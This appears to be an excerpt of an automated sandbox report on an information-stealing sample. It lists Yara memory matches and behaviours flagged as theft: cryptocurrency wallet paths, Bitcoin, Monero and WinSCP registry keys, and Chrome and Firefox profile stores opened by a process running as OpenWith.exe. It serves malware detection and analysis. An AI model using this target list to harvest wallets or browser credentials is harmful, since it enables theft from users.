Source: Yara match	File source: 0000000E.00000003.1739181531.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1745060493.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1765364016.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1774030054.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1730971445.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1759435128.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1749345129.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1744476159.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1743945250.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1748274287.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1627889710.000001F9DF920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1770471428.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1737974066.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1733891571.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1775675719.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1758603457.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1738781521.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1750663652.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1766830436.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1737361189.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1746053538.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1735264963.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1771728010.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1764871739.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1732324317.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1602767929.00000000028D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1752123123.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1739761324.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1738314505.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1749877777.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1754168196.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1726579095.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1734444495.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1752709890.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1753586274.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1748873710.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1742093895.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1763763009.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1745501240.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1755359019.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1774918323.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1736566513.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1748590947.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1756177662.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1757743595.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1773734067.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1735678354.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1740296656.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1756708487.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1752460608.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1744204587.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1731959678.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1740765343.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1726579095.000001F9E0C91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1736978478.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1750934596.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1731676215.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1751248603.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1753303535.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1766516787.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1767428012.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1755616290.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1731420429.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1765992633.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1750138359.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1754962335.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1742638722.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1747838363.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1742967878.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1736196050.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1754590766.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1751538386.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1774468300.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1757113350.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1761379644.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1743292419.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: OpenWith.exe, 0000000E.00000003.1774213689.000001F9E0234000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %AppData%\Electrum-LTC\config
Source: OpenWith.exe, 0000000E.00000003.1774213689.000001F9E0234000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %AppData%\com.liberty.jaxx
Source: OpenWith.exe, 0000000E.00000003.1774213689.000001F9E0234000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: passphrase.json
Source: OpenWith.exe, 0000000E.00000003.1774213689.000001F9E0234000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %AppData%\Exodus
Source: powershell.exe, 00000003.00000002.1684222885.00007FFB4B530000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sqlcolumnencryptionkeystoreprovider

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\System32\OpenWith.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-Qt			Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core			Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\System32\OpenWith.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e9edf720-d88f-46ea-8d95-7134a339b3c1	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\24a4ohrz.default-release	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\84b89d2b-fec7-4b59-87f2-603dcfbd43dd	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Monochrome	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\1dcaa933-a69d-41cc-acb5-708980d119e5	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Monochrome	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f463e7a-ef1f-4e71-ae85-88471a72b3d6	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\b79425d0-2f84-41d2-84d3-9f598259534d	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\881ae04a-fa90-4a62-8eee-5ae000467040	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Maskable	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\697416b8-55c0-41ac-9636-a06aa38f99e9	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cache2	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Maskable	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\b7e6c706-6d19-4b9e-9c37-e5ee870c2129	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Monochrome	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Monochrome	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\af2cf244-1bda-453b-baae-9793e72e9be8	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data	Jump to behavior
